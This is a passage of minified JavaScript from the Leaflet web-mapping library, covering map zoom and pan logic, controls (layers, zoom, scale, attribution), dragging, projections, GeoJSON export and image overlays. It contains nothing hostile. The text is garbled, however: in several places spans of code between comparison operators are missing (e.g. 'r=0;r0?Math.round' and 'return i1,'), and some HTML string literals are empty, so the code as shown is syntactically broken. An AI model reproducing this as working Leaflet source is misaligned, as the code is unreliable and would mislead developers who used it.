0}this._locationWatchId!==void 0&&this.stopLocate(),this._stop(),$(this._mapPane),this._clearControlPos&&this._clearControlPos(),this._resizeRequest&&(dt(this._resizeRequest),this._resizeRequest=null),this._clearHandlers(),this._loaded&&this.fire("unload");var t;for(t in this._layers)this._layers[t].remove();for(t in this._panes)$(this._panes[t]);return this._layers=[],this._panes=[],delete this._mapPane,delete this._renderer,this},createPane:function(t,e){var i="leaflet-pane"+(t?" leaflet-"+t.replace("Pane","")+"-pane":""),n=U("div",i,e||this._mapPane);return t&&(this._panes[t]=n),n},getCenter:function(){return this._checkIfLoaded(),this._lastCenter&&!this._moved()?this._lastCenter.clone():this.layerPointToLatLng(this._getCenterLayerPoint())},getZoom:function(){return this._zoom},getBounds:function(){var t=this.getPixelBounds(),e=this.unproject(t.getBottomLeft()),i=this.unproject(t.getTopRight());return new vt(e,i)},getMinZoom:function(){return this.options.minZoom===void 0?this._layersMinZoom||0:this.options.minZoom},getMaxZoom:function(){return this.options.maxZoom===void 0?this._layersMaxZoom===void 0?1/0:this._layersMaxZoom:this.options.maxZoom},getBoundsZoom:function(t,e,i){t=it(t),i=Z(i||[0,0]);var n=this.getZoom()||0,o=this.getMinZoom(),s=this.getMaxZoom(),r=t.getNorthWest(),a=t.getSouthEast(),u=this.getSize().subtract(i),c=pt(this.project(a,n),this.project(r,n)).getSize(),y=T.any3d?this.options.zoomSnap:1,C=u.x/c.x,N=u.y/c.y,_t=e?Math.max(C,N):Math.min(C,N);return n=this.getScaleZoom(_t,n),y&&(n=Math.round(n/(y/100))*(y/100),n=e?Math.ceil(n/y)*y:Math.floor(n/y)*y),Math.max(o,Math.min(s,n))},getSize:function(){return(!this._size||this._sizeChanged)&&(this._size=new E(this._container.clientWidth||0,this._container.clientHeight||0),this._sizeChanged=!1),this._size.clone()},getPixelBounds:function(t,e){var i=this._getTopLeftPoint(t,e);return new Q(i,i.add(this.getSize()))},getPixelOrigin:function(){return this._checkIfLoaded(),this._pixelOrigin},getPixelWorldBounds:function(t){return this.options.crs.getProjectedBounds(t===void 0?this.getZoom():t)},getPane:function(t){return typeof t=="string"?this._panes[t]:t},getPanes:function(){return this._panes},getContainer:function(){return this._container},getZoomScale:function(t,e){var i=this.options.crs;return e=e===void 0?this._zoom:e,i.scale(t)/i.scale(e)},getScaleZoom:function(t,e){var i=this.options.crs;e=e===void 0?this._zoom:e;var n=i.zoom(t*i.scale(e));return isNaN(n)?1/0:n},project:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.latLngToPoint(F(t),e)},unproject:function(t,e){return e=e===void 0?this._zoom:e,this.options.crs.pointToLatLng(Z(t),e)},layerPointToLatLng:function(t){var e=Z(t).add(this.getPixelOrigin());return this.unproject(e)},latLngToLayerPoint:function(t){var e=this.project(F(t))._round();return e._subtract(this.getPixelOrigin())},wrapLatLng:function(t){return this.options.crs.wrapLatLng(F(t))},wrapLatLngBounds:function(t){return this.options.crs.wrapLatLngBounds(it(t))},distance:function(t,e){return this.options.crs.distance(F(t),F(e))},containerPointToLayerPoint:function(t){return Z(t).subtract(this._getMapPanePos())},layerPointToContainerPoint:function(t){return Z(t).add(this._getMapPanePos())},containerPointToLatLng:function(t){var e=this.containerPointToLayerPoint(Z(t));return this.layerPointToLatLng(e)},latLngToContainerPoint:function(t){return this.layerPointToContainerPoint(this.latLngToLayerPoint(F(t)))},mouseEventToContainerPoint:function(t){return sn(t,this._container)},mouseEventToLayerPoint:function(t){return this.containerPointToLayerPoint(this.mouseEventToContainerPoint(t))},mouseEventToLatLng:function(t){return this.layerPointToLatLng(this.mouseEventToLayerPoint(t))},_initContainer:function(t){var e=this._container=tn(t);if(e){if(e._leaflet_id)throw new Error("Map container is already initialized.")}else throw new Error("Map container not found.");I(e,"scroll",this._onScroll,this),this._containerId=g(e)},_initLayout:function(){var t=this._container;this._fadeAnimated=this.options.fadeAnimation&&T.any3d,A(t,"leaflet-container"+(T.touch?" leaflet-touch":"")+(T.retina?" leaflet-retina":"")+(T.ielt9?" leaflet-oldie":"")+(T.safari?" leaflet-safari":"")+(this._fadeAnimated?" leaflet-fade-anim":""));var e=ue(t,"position");e!=="absolute"&&e!=="relative"&&e!=="fixed"&&e!=="sticky"&&(t.style.position="relative"),this._initPanes(),this._initControlPos&&this._initControlPos()},_initPanes:function(){var t=this._panes={};this._paneRenderers={},this._mapPane=this.createPane("mapPane",this._container),nt(this._mapPane,new E(0,0)),this.createPane("tilePane"),this.createPane("overlayPane"),this.createPane("shadowPane"),this.createPane("markerPane"),this.createPane("tooltipPane"),this.createPane("popupPane"),this.options.markerZoomAnimation||(A(t.markerPane,"leaflet-zoom-hide"),A(t.shadowPane,"leaflet-zoom-hide"))},_resetView:function(t,e,i){nt(this._mapPane,new E(0,0));var n=!this._loaded;this._loaded=!0,e=this._limitZoom(e),this.fire("viewprereset");var o=this._zoom!==e;this._moveStart(o,i)._move(t,e)._moveEnd(o),this.fire("viewreset"),n&&this.fire("load")},_moveStart:function(t,e){return t&&this.fire("zoomstart"),e||this.fire("movestart"),this},_move:function(t,e,i,n){e===void 0&&(e=this._zoom);var o=this._zoom!==e;return this._zoom=e,this._lastCenter=t,this._pixelOrigin=this._getNewPixelOrigin(t),n?i&&i.pinch&&this.fire("zoom",i):((o||i&&i.pinch)&&this.fire("zoom",i),this.fire("move",i)),this},_moveEnd:function(t){return t&&this.fire("zoomend"),this.fire("moveend")},_stop:function(){return dt(this._flyToFrame),this._panAnim&&this._panAnim.stop(),this},_rawPanBy:function(t){nt(this._mapPane,this._getMapPanePos().subtract(t))},_getZoomSpan:function(){return this.getMaxZoom()-this.getMinZoom()},_panInsideMaxBounds:function(){this._enforcingBounds||this.panInsideBounds(this.options.maxBounds)},_checkIfLoaded:function(){if(!this._loaded)throw new Error("Set map center and zoom first.")},_initEvents:function(t){this._targets={},this._targets[g(this._container)]=this;var e=t?K:I;e(this._container,"click dblclick mousedown mouseup mouseover mouseout mousemove contextmenu keypress keydown keyup",this._handleDOMEvent,this),this.options.trackResize&&e(window,"resize",this._onResize,this),T.any3d&&this.options.transform3DLimit&&(t?this.off:this.on).call(this,"moveend",this._onMoveEnd)},_onResize:function(){dt(this._resizeRequest),this._resizeRequest=X(function(){this.invalidateSize({debounceMoveend:!0})},this)},_onScroll:function(){this._container.scrollTop=0,this._container.scrollLeft=0},_onMoveEnd:function(){var t=this._getMapPanePos();Math.max(Math.abs(t.x),Math.abs(t.y))>=this.options.transform3DLimit&&this._resetView(this.getCenter(),this.getZoom())},_findEventTargets:function(t,e){for(var i=[],n,o=e==="mouseout"||e==="mouseover",s=t.target||t.srcElement,r=!1;s;){if(n=this._targets[g(s)],n&&(e==="click"||e==="preclick")&&this._draggableMoved(n)){r=!0;break}if(n&&n.listens(e,!0)&&(o&&!fi(s,t)||(i.push(n),o))||s===this._container)break;s=s.parentNode}return!i.length&&!r&&!o&&this.listens(e,!0)&&(i=[this]),i},_isClickDisabled:function(t){for(;t&&t!==this._container;){if(t._leaflet_disable_click)return!0;t=t.parentNode}},_handleDOMEvent:function(t){var e=t.target||t.srcElement;if(!(!this._loaded||e._leaflet_disable_events||t.type==="click"&&this._isClickDisabled(e))){var i=t.type;i==="mousedown"&&ri(e),this._fireDOMEvent(t,i)}},_mouseEvents:["click","dblclick","mouseover","mouseout","contextmenu"],_fireDOMEvent:function(t,e,i){if(t.type==="click"){var n=l({},t);n.type="preclick",this._fireDOMEvent(n,n.type,i)}var o=this._findEventTargets(t,e);if(i){for(var s=[],r=0;r0?Math.round(t-e)/2:Math.max(0,Math.ceil(t))-Math.max(0,Math.floor(e))},_limitZoom:function(t){var e=this.getMinZoom(),i=this.getMaxZoom(),n=T.any3d?this.options.zoomSnap:1;return n&&(t=Math.round(t/n)*n),Math.max(e,Math.min(i,t))},_onPanTransitionStep:function(){this.fire("move")},_onPanTransitionEnd:function(){tt(this._mapPane,"leaflet-pan-anim"),this.fire("moveend")},_tryAnimatedPan:function(t,e){var i=this._getCenterOffset(t)._trunc();return(e&&e.animate)!==!0&&!this.getSize().contains(i)?!1:(this.panBy(i,e),!0)},_createAnimProxy:function(){var t=this._proxy=U("div","leaflet-proxy leaflet-zoom-animated");this._panes.mapPane.appendChild(t),this.on("zoomanim",function(e){var i=$e,n=this._proxy.style[i];Gt(this._proxy,this.project(e.center,e.zoom),this.getZoomScale(e.zoom,1)),n===this._proxy.style[i]&&this._animatingZoom&&this._onZoomTransitionEnd()},this),this.on("load moveend",this._animMoveEnd,this),this._on("unload",this._destroyAnimProxy,this)},_destroyAnimProxy:function(){$(this._proxy),this.off("load moveend",this._animMoveEnd,this),delete this._proxy},_animMoveEnd:function(){var t=this.getCenter(),e=this.getZoom();Gt(this._proxy,this.project(t,e),this.getZoomScale(e,1))},_catchTransitionEnd:function(t){this._animatingZoom&&t.propertyName.indexOf("transform")>=0&&this._onZoomTransitionEnd()},_nothingToAnimate:function(){return!this._container.getElementsByClassName("leaflet-zoom-animated").length},_tryAnimatedZoom:function(t,e,i){if(this._animatingZoom)return!0;if(i=i||{},!this._zoomAnimated||i.animate===!1||this._nothingToAnimate()||Math.abs(e-this._zoom)>this.options.zoomAnimationThreshold)return!1;var n=this.getZoomScale(e),o=this._getCenterOffset(t)._divideBy(1-1/n);return i.animate!==!0&&!this.getSize().contains(o)?!1:(X(function(){this._moveStart(!0,i.noMoveStart||!1)._animateZoom(t,e,!0)},this),!0)},_animateZoom:function(t,e,i,n){this._mapPane&&(i&&(this._animatingZoom=!0,this._animateToCenter=t,this._animateToZoom=e,A(this._mapPane,"leaflet-zoom-anim")),this.fire("zoomanim",{center:t,zoom:e,noUpdate:n}),this._tempFireZoomEvent||(this._tempFireZoomEvent=this._zoom!==this._animateToZoom),this._move(this._animateToCenter,this._animateToZoom,void 0,!0),setTimeout(_(this._onZoomTransitionEnd,this),250))},_onZoomTransitionEnd:function(){this._animatingZoom&&(this._mapPane&&tt(this._mapPane,"leaflet-zoom-anim"),this._animatingZoom=!1,this._move(this._animateToCenter,this._animateToZoom,void 0,!0),this._tempFireZoomEvent&&this.fire("zoom"),delete this._tempFireZoomEvent,this.fire("move"),this._moveEnd(!0))}});function To(t,e){return new H(t,e)}var Mt=lt.extend({options:{position:"topright"},initialize:function(t){k(this,t)},getPosition:function(){return this.options.position},setPosition:function(t){var e=this._map;return e&&e.removeControl(this),this.options.position=t,e&&e.addControl(this),this},getContainer:function(){return this._container},addTo:function(t){this.remove(),this._map=t;var e=this._container=this.onAdd(t),i=this.getPosition(),n=t._controlCorners[i];return A(e,"leaflet-control"),i.indexOf("bottom")!==-1?n.insertBefore(e,n.firstChild):n.appendChild(e),this._map.on("unload",this.remove,this),this},remove:function(){return this._map?($(this._container),this.onRemove&&this.onRemove(this._map),this._map.off("unload",this.remove,this),this._map=null,this):this},_refocusOnMap:function(t){this._map&&t&&t.screenX>0&&t.screenY>0&&this._map.getContainer().focus()}}),_e=function(t){return new Mt(t)};H.include({addControl:function(t){return t.addTo(this),this},removeControl:function(t){return t.remove(),this},_initControlPos:function(){var t=this._controlCorners={},e="leaflet-",i=this._controlContainer=U("div",e+"control-container",this._container);function n(o,s){var r=e+o+" "+e+s;t[o+s]=U("div",r,i)}n("top","left"),n("top","right"),n("bottom","left"),n("bottom","right")},_clearControlPos:function(){for(var t in this._controlCorners)$(this._controlCorners[t]);$(this._controlContainer),delete this._controlCorners,delete this._controlContainer}});var hn=Mt.extend({options:{collapsed:!0,position:"topright",autoZIndex:!0,hideSingleBase:!1,sortLayers:!1,sortFunction:function(t,e,i,n){return i1,this._baseLayersList.style.display=t?"":"none"),this._separator.style.display=e&&t?"":"none",this},_onLayerChange:function(t){this._handlingClick||this._update();var e=this._getLayer(g(t.target)),i=e.overlay?t.type==="add"?"overlayadd":"overlayremove":t.type==="add"?"baselayerchange":null;i&&this._map.fire(i,e)},_createRadioElement:function(t,e){var i='",n=document.createElement("div");return n.innerHTML=i,n.firstChild},_addItem:function(t){var e=document.createElement("label"),i=this._map.hasLayer(t.layer),n;t.overlay?(n=document.createElement("input"),n.type="checkbox",n.className="leaflet-control-layers-selector",n.defaultChecked=i):n=this._createRadioElement("leaflet-base-layers_"+g(this),i),this._layerControlInputs.push(n),n.layerId=g(t.layer),I(n,"click",this._onInputClick,this);var o=document.createElement("span");o.innerHTML=" "+t.name;var s=document.createElement("span");e.appendChild(s),s.appendChild(n),s.appendChild(o);var r=t.overlay?this._overlaysList:this._baseLayersList;return r.appendChild(e),this._checkDisabledLayers(),e},_onInputClick:function(){if(!this._preventClick){var t=this._layerControlInputs,e,i,n=[],o=[];this._handlingClick=!0;for(var s=t.length-1;s>=0;s--)e=t[s],i=this._getLayer(e.layerId).layer,e.checked?n.push(i):e.checked||o.push(i);for(s=0;s=0;o--)e=t[o],i=this._getLayer(e.layerId).layer,e.disabled=i.options.minZoom!==void 0&&ni.options.maxZoom},_expandIfNotCollapsed:function(){return this._map&&!this.options.collapsed&&this.expand(),this},_expandSafely:function(){var t=this._section;this._preventClick=!0,I(t,"click",ut),this.expand();var e=this;setTimeout(function(){K(t,"click",ut),e._preventClick=!1})}}),Mo=function(t,e,i){return new hn(t,e,i)},di=Mt.extend({options:{position:"topleft",zoomInText:'',zoomInTitle:"Zoom in",zoomOutText:'',zoomOutTitle:"Zoom out"},onAdd:function(t){var e="leaflet-control-zoom",i=U("div",e+" leaflet-bar"),n=this.options;return this._zoomInButton=this._createButton(n.zoomInText,n.zoomInTitle,e+"-in",i,this._zoomIn),this._zoomOutButton=this._createButton(n.zoomOutText,n.zoomOutTitle,e+"-out",i,this._zoomOut),this._updateDisabled(),t.on("zoomend zoomlevelschange",this._updateDisabled,this),i},onRemove:function(t){t.off("zoomend zoomlevelschange",this._updateDisabled,this)},disable:function(){return this._disabled=!0,this._updateDisabled(),this},enable:function(){return this._disabled=!1,this._updateDisabled(),this},_zoomIn:function(t){!this._disabled&&this._map._zoomthis._map.getMinZoom()&&this._map.zoomOut(this._map.options.zoomDelta*(t.shiftKey?3:1))},_createButton:function(t,e,i,n,o){var s=U("a",i,n);return s.innerHTML=t,s.href="#",s.title=e,s.setAttribute("role","button"),s.setAttribute("aria-label",e),de(s),I(s,"click",Kt),I(s,"click",o,this),I(s,"click",this._refocusOnMap,this),s},_updateDisabled:function(){var t=this._map,e="leaflet-disabled";tt(this._zoomInButton,e),tt(this._zoomOutButton,e),this._zoomInButton.setAttribute("aria-disabled","false"),this._zoomOutButton.setAttribute("aria-disabled","false"),(this._disabled||t._zoom===t.getMinZoom())&&(A(this._zoomOutButton,e),this._zoomOutButton.setAttribute("aria-disabled","true")),(this._disabled||t._zoom===t.getMaxZoom())&&(A(this._zoomInButton,e),this._zoomInButton.setAttribute("aria-disabled","true"))}});H.mergeOptions({zoomControl:!0}),H.addInitHook(function(){this.options.zoomControl&&(this.zoomControl=new di,this.addControl(this.zoomControl))});var Co=function(t){return new di(t)},un=Mt.extend({options:{position:"bottomleft",maxWidth:100,metric:!0,imperial:!0},onAdd:function(t){var e="leaflet-control-scale",i=U("div",e),n=this.options;return this._addScales(n,e+"-line",i),t.on(n.updateWhenIdle?"moveend":"move",this._update,this),t.whenReady(this._update,this),i},onRemove:function(t){t.off(this.options.updateWhenIdle?"moveend":"move",this._update,this)},_addScales:function(t,e,i){t.metric&&(this._mScale=U("div",e,i)),t.imperial&&(this._iScale=U("div",e,i))},_update:function(){var t=this._map,e=t.getSize().y/2,i=t.distance(t.containerPointToLatLng([0,e]),t.containerPointToLatLng([this.options.maxWidth,e]));this._updateScales(i)},_updateScales:function(t){this.options.metric&&t&&this._updateMetric(t),this.options.imperial&&t&&this._updateImperial(t)},_updateMetric:function(t){var e=this._getRoundNum(t),i=e<1e3?e+" m":e/1e3+" km";this._updateScale(this._mScale,i,e/t)},_updateImperial:function(t){var e=t*3.2808399,i,n,o;e>5280?(i=e/5280,n=this._getRoundNum(i),this._updateScale(this._iScale,n+" mi",n/i)):(o=this._getRoundNum(e),this._updateScale(this._iScale,o+" ft",o/e))},_updateScale:function(t,e,i){t.style.width=Math.round(this.options.maxWidth*i)+"px",t.innerHTML=e},_getRoundNum:function(t){var e=Math.pow(10,(Math.floor(t)+"").length-1),i=t/e;return i=i>=10?10:i>=5?5:i>=3?3:i>=2?2:1,e*i}}),So=function(t){return new un(t)},ko='',_i=Mt.extend({options:{position:"bottomright",prefix:''+(T.inlineSvg?ko+" ":"")+"Leaflet"},initialize:function(t){k(this,t),this._attributions={}},onAdd:function(t){t.attributionControl=this,this._container=U("div","leaflet-control-attribution"),de(this._container);for(var e in t._layers)t._layers[e].getAttribution&&this.addAttribution(t._layers[e].getAttribution());return this._update(),t.on("layeradd",this._addAttribution,this),this._container},onRemove:function(t){t.off("layeradd",this._addAttribution,this)},_addAttribution:function(t){t.layer.getAttribution&&(this.addAttribution(t.layer.getAttribution()),t.layer.once("remove",function(){this.removeAttribution(t.layer.getAttribution())},this))},setPrefix:function(t){return this.options.prefix=t,this._update(),this},addAttribution:function(t){return t?(this._attributions[t]||(this._attributions[t]=0),this._attributions[t]++,this._update(),this):this},removeAttribution:function(t){return t?(this._attributions[t]&&(this._attributions[t]--,this._update()),this):this},_update:function(){if(this._map){var t=[];for(var e in this._attributions)this._attributions[e]&&t.push(e);var i=[];this.options.prefix&&i.push(this.options.prefix),t.length&&i.push(t.join(", ")),this._container.innerHTML=i.join(' ')}}});H.mergeOptions({attributionControl:!0}),H.addInitHook(function(){this.options.attributionControl&&new _i().addTo(this)});var Eo=function(t){return new _i(t)};Mt.Layers=hn,Mt.Zoom=di,Mt.Scale=un,Mt.Attribution=_i,_e.layers=Mo,_e.zoom=Co,_e.scale=So,_e.attribution=Eo;var Et=lt.extend({initialize:function(t){this._map=t},enable:function(){return this._enabled?this:(this._enabled=!0,this.addHooks(),this)},disable:function(){return this._enabled?(this._enabled=!1,this.removeHooks(),this):this},enabled:function(){return!!this._enabled}});Et.addTo=function(t,e){return t.addHandler(e,this),this};var zo={Events:et},ln=T.touch?"touchstart mousedown":"mousedown",Ut=Ht.extend({options:{clickTolerance:3},initialize:function(t,e,i,n){k(this,n),this._element=t,this._dragStartTarget=e||t,this._preventOutline=i},enable:function(){this._enabled||(I(this._dragStartTarget,ln,this._onDown,this),this._enabled=!0)},disable:function(){this._enabled&&(Ut._dragging===this&&this.finishDrag(!0),K(this._dragStartTarget,ln,this._onDown,this),this._enabled=!1,this._moved=!1)},_onDown:function(t){if(this._enabled&&(this._moved=!1,!ti(this._element,"leaflet-zoom-anim"))){if(t.touches&&t.touches.length!==1){Ut._dragging===this&&this.finishDrag();return}if(!(Ut._dragging||t.shiftKey||t.which!==1&&t.button!==1&&!t.touches)&&(Ut._dragging=this,this._preventOutline&&ri(this._element),ni(),le(),!this._moving)){this.fire("down");var e=t.touches?t.touches[0]:t,i=en(this._element);this._startPoint=new E(e.clientX,e.clientY),this._startPos=qt(this._element),this._parentScale=ai(i);var n=t.type==="mousedown";I(document,n?"mousemove":"touchmove",this._onMove,this),I(document,n?"mouseup":"touchend touchcancel",this._onUp,this)}}},_onMove:function(t){if(this._enabled){if(t.touches&&t.touches.length>1){this._moved=!0;return}var e=t.touches&&t.touches.length===1?t.touches[0]:t,i=new E(e.clientX,e.clientY)._subtract(this._startPoint);!i.x&&!i.y||Math.abs(i.x)+Math.abs(i.y)s&&(r=a,s=u);s>i&&(e[r]=1,pi(t,e,i,n,r),pi(t,e,i,r,o))}function Ao(t,e){for(var i=[t[0]],n=1,o=0,s=t.length;ne&&(i.push(t[n]),o=n);return oe.max.x&&(i|=2),t.ye.max.y&&(i|=8),i}function Bo(t,e){var i=e.x-t.x,n=e.y-t.y;return i*i+n*n}function me(t,e,i,n){var o=e.x,s=e.y,r=i.x-o,a=i.y-s,u=r*r+a*a,c;return u>0&&(c=((t.x-o)*r+(t.y-s)*a)/u,c>1?(o=i.x,s=i.y):c>0&&(o+=r*c,s+=a*c)),r=t.x-o,a=t.y-s,n?r*r+a*a:new E(o,s)}function xt(t){return!q(t[0])||typeof t[0][0]!="object"&&typeof t[0][0]<"u"}function vn(t){return console.warn("Deprecated use of _flat, please use L.LineUtil.isFlat instead."),xt(t)}function gn(t,e){var i,n,o,s,r,a,u,c;if(!t||t.length===0)throw new Error("latlngs not passed");xt(t)||(console.warn("latlngs are not flat! Only the first ring will be used"),t=t[0]);var y=F([0,0]),C=it(t),N=C.getNorthWest().distanceTo(C.getSouthWest())*C.getNorthEast().distanceTo(C.getNorthWest());N<1700&&(y=mi(t));var _t=t.length,at=[];for(i=0;i<_t;i++){var Lt=F(t[i]);at.push(e.project(F([Lt.lat-y.lat,Lt.lng-y.lng])))}for(i=0,n=0;i<_t-1;i++)n+=at[i].distanceTo(at[i+1])/2;if(n===0)c=at[0];else for(i=0,s=0;i<_t-1;i++)if(r=at[i],a=at[i+1],o=r.distanceTo(a),s+=o,s>n){u=(s-n)/o,c=[a.x-u*(a.x-r.x),a.y-u*(a.y-r.y)];break}var gt=e.unproject(Z(c));return F([gt.lat+y.lat,gt.lng+y.lng])}var No={__proto__:null,simplify:dn,pointToSegmentDistance:_n,closestPointOnSegment:Zo,clipSegment:pn,_getEdgeIntersection:Oe,_getBitCode:Yt,_sqClosestPointOnSegment:me,isFlat:xt,_flat:vn,polylineCenter:gn},vi={project:function(t){return new E(t.lng,t.lat)},unproject:function(t){return new j(t.y,t.x)},bounds:new Q([-180,-90],[180,90])},gi={R:6378137,R_MINOR:6356752314245179e-9,bounds:new Q([-2003750834279e-5,-1549657073972e-5],[2003750834279e-5,1876465623138e-5]),project:function(t){var e=Math.PI/180,i=this.R,n=t.lat*e,o=this.R_MINOR/i,s=Math.sqrt(1-o*o),r=s*Math.sin(n),a=Math.tan(Math.PI/4-n/2)/Math.pow((1-r)/(1+r),s/2);return n=-i*Math.log(Math.max(a,1e-10)),new E(t.lng*e*i,n)},unproject:function(t){for(var e=180/Math.PI,i=this.R,n=this.R_MINOR/i,o=Math.sqrt(1-n*n),s=Math.exp(-t.y/i),r=Math.PI/2-2*Math.atan(s),a=0,u=.1,c;a<15&&Math.abs(u)>1e-7;a++)c=o*Math.sin(r),c=Math.pow((1-c)/(1+c),o/2),u=Math.PI/2-2*Math.atan(s*c)-r,r+=u;return new j(r*e,t.x*e/i)}},Do={__proto__:null,LonLat:vi,Mercator:gi,SphericalMercator:Ve},Ro=l({},Wt,{code:"EPSG:3395",projection:gi,transformation:function(){var t=.5/(Math.PI*gi.R);return re(t,.5,-t,.5)}()}),yn=l({},Wt,{code:"EPSG:4326",projection:vi,transformation:re(1/180,1,-1/180,.5)}),Fo=l({},Zt,{projection:vi,transformation:re(1,0,-1,0),scale:function(t){return Math.pow(2,t)},zoom:function(t){return Math.log(t)/Math.LN2},distance:function(t,e){var i=e.lng-t.lng,n=e.lat-t.lat;return Math.sqrt(i*i+n*n)},infinite:!0});Zt.Earth=Wt,Zt.EPSG3395=Ro,Zt.EPSG3857=qe,Zt.EPSG900913=Gn,Zt.EPSG4326=yn,Zt.Simple=Fo;var Ct=Ht.extend({options:{pane:"overlayPane",attribution:null,bubblingMouseEvents:!0},addTo:function(t){return t.addLayer(this),this},remove:function(){return this.removeFrom(this._map||this._mapToAdd)},removeFrom:function(t){return t&&t.removeLayer(this),this},getPane:function(t){return this._map.getPane(t?this.options[t]||t:this.options.pane)},addInteractiveTarget:function(t){return this._map._targets[g(t)]=this,this},removeInteractiveTarget:function(t){return delete this._map._targets[g(t)],this},getAttribution:function(){return this.options.attribution},_layerAdd:function(t){var e=t.target;if(e.hasLayer(this)){if(this._map=e,this._zoomAnimated=e._zoomAnimated,this.getEvents){var i=this.getEvents();e.on(i,this),this.once("remove",function(){e.off(i,this)},this)}this.onAdd(e),this.fire("add"),e.fire("layeradd",{layer:this})}}});H.include({addLayer:function(t){if(!t._layerAdd)throw new Error("The provided object is not a Layer.");var e=g(t);return this._layers[e]?this:(this._layers[e]=t,t._mapToAdd=this,t.beforeAdd&&t.beforeAdd(this),this.whenReady(t._layerAdd,t),this)},removeLayer:function(t){var e=g(t);return this._layers[e]?(this._loaded&&t.onRemove(this),delete this._layers[e],this._loaded&&(this.fire("layerremove",{layer:t}),t.fire("remove")),t._map=t._mapToAdd=null,this):this},hasLayer:function(t){return g(t)in this._layers},eachLayer:function(t,e){for(var i in this._layers)t.call(e,this._layers[i]);return this},_addLayers:function(t){t=t?q(t)?t:[t]:[];for(var e=0,i=t.length;ethis._layersMaxZoom&&this.setZoom(this._layersMaxZoom),this.options.minZoom===void 0&&this._layersMinZoom&&this.getZoom()=2&&e[0]instanceof j&&e[0].equals(e[i-1])&&e.pop(),e},_setLatLngs:function(t){At.prototype._setLatLngs.call(this,t),xt(this._latlngs)&&(this._latlngs=[this._latlngs])},_defaultShape:function(){return xt(this._latlngs[0])?this._latlngs[0]:this._latlngs[0][0]},_clipPoints:function(){var t=this._renderer._bounds,e=this.options.weight,i=new E(e,e);if(t=new Q(t.min.subtract(i),t.max.add(i)),this._parts=[],!(!this._pxBounds||!this._pxBounds.intersects(t))){if(this.options.noClip){this._parts=this._rings;return}for(var n=0,o=this._rings.length,s;nt.y!=o.y>t.y&&t.x<(o.x-n.x)*(t.y-n.y)/(o.y-n.y)+n.x&&(e=!e);return e||At.prototype._containsPoint.call(this,t,!0)}});function Ko(t,e){return new ie(t,e)}var Bt=It.extend({initialize:function(t,e){k(this,e),this._layers={},t&&this.addData(t)},addData:function(t){var e=q(t)?t:t.features,i,n,o;if(e){for(i=0,n=e.length;i0&&o.push(o[0].slice()),o}function ne(t,e){return t.feature?l({},t.feature,{geometry:e}):De(e)}function De(t){return t.type==="Feature"||t.type==="FeatureCollection"?t:{type:"Feature",properties:{},geometry:t}}var xi={toGeoJSON:function(t){return ne(this,{type:"Point",coordinates:Pi(this.getLatLng(),t)})}};Ze.include(xi),yi.include(xi),Ie.include(xi),At.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=Ne(this._latlngs,e?1:0,!1,t);return ne(this,{type:(e?"Multi":"")+"LineString",coordinates:i})}}),ie.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=e&&!xt(this._latlngs[0]),n=Ne(this._latlngs,i?2:e?1:0,!0,t);return e||(n=[n]),ne(this,{type:(i?"Multi":"")+"Polygon",coordinates:n})}}),te.include({toMultiPoint:function(t){var e=[];return this.eachLayer(function(i){e.push(i.toGeoJSON(t).geometry.coordinates)}),ne(this,{type:"MultiPoint",coordinates:e})},toGeoJSON:function(t){var e=this.feature&&this.feature.geometry&&this.feature.geometry.type;if(e==="MultiPoint")return this.toMultiPoint(t);var i=e==="GeometryCollection",n=[];return this.eachLayer(function(o){if(o.toGeoJSON){var s=o.toGeoJSON(t);if(i)n.push(s.geometry);else{var r=De(s);r.type==="FeatureCollection"?n.push.apply(n,r.features):n.push(r)}}}),i?ne(this,{geometries:n,type:"GeometryCollection"}):{type:"FeatureCollection",features:n}}});function xn(t,e){return new Bt(t,e)}var Yo=xn,Re=Ct.extend({options:{opacity:1,alt:"",interactive:!1,crossOrigin:!1,errorOverlayUrl:"",zIndex:1,className:""},initialize:function(t,e,i){this._url=t,this._bounds=it(e),k(this,i)},onAdd:function(){this._image||(this._initImage(),this.options.opacity<1&&this._updateOpacity()),this.options.interactive&&(A(this._image,"leaflet-interactive"),this.addInteractiveTarget(this._image)),this.getPane().appendChild(this._image),this._reset()},onRemove:function(){$(this._image),this.options.interactive&&this.removeInteractiveTarget(this._image)},setOpacity:function(t){return this.options.opacity=t,this._image&&this._updateOpacity(),this},setStyle:function(t){return t.opacity&&this.setOpacity(t.opacity),this},bringToFront:function(){return this._map&&Qt(this._image),this},bringToBack:function(){return this._map&&$t(this._image),this},setUrl:function(t){return this._url=t,this._image&&(this._image.src=t),this},setBounds:function(t){return this._bounds=it(t),this._map&&this._reset(),this},getEvents:function(){var t={zoom:this._reset,viewreset:this._reset};return this._zoomAnimated&&(t.zoomanim=this._animateZoom),t},setZIndex:function(t){return this.options.zIndex=t,this._updateZIndex(),this},getBounds:function(){return this._bounds},getElement:function(){return this._image},_initImage:function(){var t=this._url.tagName==="IMG",e=this._image=t?this._url:U("img");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onload=_(this.fire,this,"load"),e.onerror=_(this._overlayOnError,this,"error"),(this.options.crossOrigin||this.options.crossOrigin==="")&&(e.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),this.options.zIndex&&this._updateZIndex(),t){this._url=e.src;return}e.src=this._url,e.alt=this.options.alt},_animateZoom:function(t){var e=this._map.getZoomScale(t.zoom),i=this._map._latLngBoundsToNewLayerBounds(this._bounds,t.zoom,t.center).min;Gt(this._image,i,e)},_reset:function(){var t=this._image,e=new Q(this._map.latLngToLayerPoint(this._bounds.getNorthWest()),this._map.latLngToLayerPoint(this._bounds.getSouthEast())),i=e.getSize();nt(t,e.min),t.style.width=i.x+"px",t.style.height=i.y+"px"},_updateOpacity:function(){Pt(this._image,this.options.opacity)},_updateZIndex:function(){this._image&&this.options.zIndex!==void 0&&this.options.zIndex!==null&&(this._image.style.zIndex=this.options.zIndex)},_overlayOnError:function(){this.fire("error");var t=this.options.errorOverlayUrl;t&&this._url!==t&&(this._url=t,this._image.src=t)},getCenter:function(){return this._bounds.getCenter()}}),Jo=function(t,e,i){return new Re(t,e,i)},Ln=Re.extend({options:{autoplay:!0,loop:!0,keepAspectRatio:!0,muted:!1,playsInline:!0},_initImage:function(){var 